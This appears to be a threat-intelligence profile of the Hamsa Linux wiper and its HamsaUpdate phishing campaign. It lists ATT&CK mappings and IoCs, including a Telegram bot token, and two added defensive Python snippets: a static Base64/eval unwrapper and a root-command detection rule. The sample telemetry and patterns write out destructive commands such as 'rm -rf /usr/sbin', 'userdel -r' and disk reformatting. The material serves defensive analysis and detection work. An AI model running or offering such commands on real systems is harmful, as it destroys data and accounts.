Mallory
Malware · Used by 1 actor

Hamsa

Hamsa is a Linux wiper malware family, described as a Bash-based destructive payload used in cross-platform campaigns alongside the Windows wiper Hatef and, in some reporting, BiBi Wiper. It is associated with the Handala Hack Team / Handala persona, which multiple security vendors assess as linked to Iran’s MOIS and also track under related cluster names including Void Manticore, Storm-0842, BANISHED KITTEN, and Dune. Reporting places Hamsa in broader Handala disruptive operations targeting primarily Israeli organizations, with later expansion to U.S., Gulf, and Western targets.

Hamsa was specifically documented in the phishing campaign dubbed Operation HamsaUpdate, which targeted Israeli customers using F5 BIG-IP-themed lures. In that campaign, victims were instructed to run a root-privileged wget command that downloaded and executed an obfuscated script named update.sh. The Linux payload was wrapped in five layers of Base64 decoded and run with eval, delayed execution for 30 minutes, fingerprinted the Linux distribution, and installed tools including xfsprogs, wipe, and parted. It then enumerated and deleted user accounts with UID greater than 999 and wiped their home directories, unmounted non-root partitions, recreated GPT partition tables, created new partitions and formatted them as XFS, and deleted system binaries under /bin, /sbin, /usr/bin, and /usr/sbin, preserving reboot and rm until late in execution, before rebooting the system to render it inoperable. The malware also reported execution status via Telegram, using the same Bot ID and chat/channel ID observed in the paired Windows variant.
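Triaging a script like the one described means unwrapping the nested Base64/eval stages statically, without executing any of them, and then checking the plaintext for the behaviours reported above. The following Python is an added example, not code from the original page or from any vendor report; it assumes the wrapper has the form eval "$(echo <base64> | base64 -d)" (the page only says five Base64 steps executed with eval) and uses a constructed, harmless stand-in for the inner script rather than the real update.sh.

```python
import base64
import re

# Constructed test fixture (not the real update.sh): a harmless stand-in for the
# inner script carrying three of the traits the page describes.
SAMPLE_INNER = (
    "#!/bin/bash\n"
    "sleep 1800\n"
    ". /etc/os-release\n"
    'curl -s "https://api.telegram.org/bot<BOT_ID_PLACEHOLDER>/sendMessage" -d "text=$ID"\n'
)
# Assumed wrapper form `eval "$(echo <b64> | base64 -d)"`; the page only says
# five Base64 steps executed with eval.
EVAL_B64 = re.compile(
    r'eval\s+"?\$\(\s*(?:echo|printf)\s+[\'"]?([A-Za-z0-9+/=]+)[\'"]?'
    r'\s*\|\s*base64\s+(?:-d|--decode)\s*\)"?'
)
# Behavioural traits drawn from the page's description of the Linux payload.
INDICATORS = {
    "delayed execution (sleep >= 10 min)": re.compile(r"\bsleep\s+([6-9]\d{2}|\d{4,})\b"),
    "distro fingerprinting": re.compile(r"/etc/os-release|lsb_release|/etc/redhat-release"),
    "telegram status reporting": re.compile(r"api\.telegram\.org/bot"),
    "account removal": re.compile(r"\buserdel\b"),
    "partition table recreation": re.compile(r"\bparted\b.*\bmklabel\b"),
    "xfs reformat": re.compile(r"\bmkfs(\.xfs|\s+-t\s+xfs)\b"),
    "system binary deletion": re.compile(r"\brm\b.*\s/(usr/)?s?bin\b"),
}

def wrap_layers(script: str, layers: int) -> str:
    """Test-input builder only: wrap a script in N base64+eval layers."""
    for _ in range(layers):
        b64 = base64.b64encode(script.encode()).decode()
        script = f'eval "$(echo {b64} | base64 -d)"\n'
    return script

def peel(script: str, max_layers: int = 10):
    """Statically unwrap nested eval/base64 layers; nothing is executed."""
    layers = 0
    while layers < max_layers:
        m = EVAL_B64.search(script)
        if not m:
            break
        try:
            script = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # malformed base64 (binascii.Error is a ValueError)
            break
        layers += 1
    return script, layers

def triage(script: str) -> dict:
    """Report obfuscation depth and which wiper traits the plaintext shows."""
    plain, layers = peel(script)
    hits = [name for name, rx in INDICATORS.items() if rx.search(plain)]
    return {"layers": layers, "indicators": hits, "plaintext": plain}
```

A depth of five layers plus a long sleep before any network or account activity is itself a strong triage signal, independent of which destructive commands the plaintext names.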

More generally, reporting describes Hamsa as part of a newer generation of Iranian-linked wipers that moved away from MBR destruction toward rapid recursive file destruction. In comparative reporting, Hamsa and BiBi are characterized as Bash-based Linux wipers targeting Linux servers, while Hatef is the .NET-based Windows counterpart. Infrastructure and IoCs mentioned in connection with the HamsaUpdate activity include the delivery URL hxxps://sjc1.vultrobjects[.]com/f5update/update.sh, Telegram Bot ID 6428401585:AAGE6SbwtVJxOpLjdMcrL45gb18H9UV7tQA, and Channel/Chat ID 6932028002. High-confidence reporting also places Hamsa among Handala’s destructive malware set, which includes BiBi Wiper, Hatef, CoolWipe, ChillWipe, Cl Wiper, and Handala Wiper.


THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers.

Handala

The group’s wiper malware family includes variants named BiBi Wiper, Hatef, Hamsa (Linux), CoolWipe, and ChillWipe.

Source: SOCRadar blog (socradar.io)
MITRE ATT&CK

Techniques & procedures

11 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques
T1566.001 Spearphishing Attachment (evidence: 1)

The most studied example is a phishing campaign from July 2024 that exploited the global CrowdStrike outage. The group sent emails to Israeli organizations with fake remediation tools. Victims who downloaded the archive got hit with a multi-stage chain that ended in a wiper payload erasing their files.

T1566.002 Spearphishing Link (evidence: 1)

Victims were directed to download a malicious archive containing a disguised installer that deployed a destructive wiper payload.

Execution

1 technique
T1204 User Execution (evidence: 1)

“the victim is instructed to run a specific file across all their Linux and Windows servers… utilize root privileges to execute a wget command… Windows server administrators are instructed to open and execute an attached archive ZIP file.”

Privilege Escalation

1 technique
T1548 Abuse Elevation Control Mechanism (evidence: 1)

“Hatef Wiper checks for Administrator privileges… presents a message box… requiring Administrator access to proceed… coax the user into granting elevated permissions.” / “For Linux servers… utilizing root privileges to execute a wget command.”

Stealth

2 techniques
T1027 Obfuscated Files or Information (evidence: 1)

“obfuscated payload… concealed within… five Base64 encoding steps… executed using the ‘eval’ command.” / “loader conceals its strings with… ADD… AutoIt script… strings… SUB… shellcode… implements the RC4 stream cipher… decrypt another payload… decompressed… LZNT1.”

T1036 Masquerading (evidence: 1)

“F5UPDATER.EXE… disguised as a system update tool of F5.” / “After masquerading as a routine update… ‘The system has been updated successfully!’” / “Naples.pif… renamed AutoIt interpreter… .pif… camouflage…”

Discovery

1 technique
T1082 System Information Discovery (evidence: 1)

“transmits… external IP address… hostname… timestamp…” / “reconnaissance to identify the Linux distribution… Red Hat, Ubuntu, or Debian.”

Command and Control

1 technique
T1102 Web Service (evidence: 1)

“During its operation, the wiper sends periodic updates to a predetermined Telegram chat…” / “this wiper version transmits data to the same Telegram channel… Bot Id… Channel Id…”

Impact

3 techniques
T1485 Data Destruction (evidence: 4)

From a vendor MITRE ATT&CK TTP table: Tactic: Impact; ID: T1485; Technique: Data Destruction.

T1531 Account Access Removal (evidence: 1)

“enumerates all user accounts with an ID number exceeding 999. It systematically eliminates these accounts and obliterates their associated files.”

T1561.002 Disk Structure Wipe (evidence: 2)

From a vendor MITRE ATT&CK TTP table: Tactic: Impact; ID: T1561.002; Technique: Disk Structure Wipe.
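The Impact techniques above are individually common in legitimate administration (an admin removes an account, reformats a spare disk), so a useful detection keys on their combination by root within a short window, in line with the 30-minute delay and rapid destruction described on this page. The following Python is an added example, not code from the original page or from Mallory; the process-event format, host names and timestamps are assumptions, and the sample telemetry is constructed.

```python
import re
from collections import defaultdict

# Command patterns mapped to the ATT&CK IDs this page lists. Only root (uid 0)
# activity is scored, since the page describes the payload running as root.
RULES = [
    ("T1204", re.compile(r"\bwget\b.*\.sh\b")),
    ("T1082", re.compile(r"cat\s+/etc/(os|redhat|lsb)-release|\blsb_release\b")),
    ("T1531", re.compile(r"\buserdel\b")),
    ("T1561.002", re.compile(r"\bparted\b.*\bmklabel\b|\bmkfs\.xfs\b")),
    ("T1485", re.compile(r"\brm\b.*\s/(usr/)?s?bin\b|\bwipe\b")),
    ("T1102", re.compile(r"api\.telegram\.org")),
]
IMPACT = {"T1531", "T1561.002", "T1485"}

def map_event(event):
    """Return the technique IDs one process event matches (empty for non-root)."""
    if event["uid"] != 0:
        return []
    return [tid for tid, rx in RULES if rx.search(event["cmd"])]

def detect_wiper_chain(events, window_s=1800):
    """Alert per host when root hits >= 2 distinct Impact techniques within window_s
    seconds. A lone userdel or mkfs by an admin does not alert; the combination does."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        for tid in map_event(ev):
            by_host[ev["host"]].append((ev["ts"], tid))
    alerts = []
    for host, hits in by_host.items():
        for i, (t0, _) in enumerate(hits):
            window = {tid for ts, tid in hits[i:] if ts - t0 <= window_s}
            if len(window & IMPACT) >= 2:
                alerts.append({"host": host, "start": t0, "techniques": sorted(window)})
                break
    return alerts

# Constructed sample telemetry (hypothetical hosts, not real logs): srv-a mirrors the
# chain described on this page after a 30-minute delay; srv-b is routine admin work.
SAMPLE_EVENTS = [
    {"host": "srv-a", "ts": 1000, "uid": 0, "cmd": "wget -q https://example.invalid/f5update/update.sh"},
    {"host": "srv-a", "ts": 2800, "uid": 0, "cmd": "cat /etc/os-release"},
    {"host": "srv-a", "ts": 2805, "uid": 0, "cmd": "userdel -r deploy"},
    {"host": "srv-a", "ts": 2810, "uid": 0, "cmd": "parted -s /dev/sdb mklabel gpt"},
    {"host": "srv-a", "ts": 2815, "uid": 0, "cmd": "mkfs.xfs -f /dev/sdb1"},
    {"host": "srv-a", "ts": 2820, "uid": 0, "cmd": "rm -rf /usr/sbin"},
    {"host": "srv-b", "ts": 3000, "uid": 0, "cmd": "userdel -r olduser"},
    {"host": "srv-b", "ts": 3100, "uid": 1001, "cmd": "mkfs.xfs /dev/loop0"},
]
```

Note that the initial wget falls outside the alert window because of the delay, so the T1204 hit should be kept as separate precursor telemetry rather than folded into the Impact correlation.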

INDICATORS OF COMPROMISE

IOCs tracked for this family

5 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.

Network
1 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
3 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
1 tracked

Other indicator types observed in public reporting.

Type / Latest sighting (values redacted on the public page)
domain / 3 years ago
hash.md5 / 3 years ago
hash.md5 / 3 years ago
hash.sha256 / 3 years ago
uri / 3 years ago